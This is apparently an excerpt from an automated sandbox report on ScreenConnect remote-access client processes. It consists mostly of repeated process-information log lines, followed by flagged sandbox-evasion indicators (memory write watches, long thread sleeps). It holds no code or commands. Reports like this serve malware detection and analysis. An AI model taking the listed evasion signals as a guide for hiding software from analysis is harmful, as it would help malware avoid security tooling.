Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 15FFDC30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 15FFF6C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Memory allocated: 1450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Memory allocated: 1AF10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Memory allocated: 1450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Memory allocated: 2E80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Memory allocated: 1450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Memory allocated: 19F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Memory allocated: 2090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Memory allocated: 4090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Memory allocated: F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Memory allocated: 1AA20000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599890	Jump to behavior
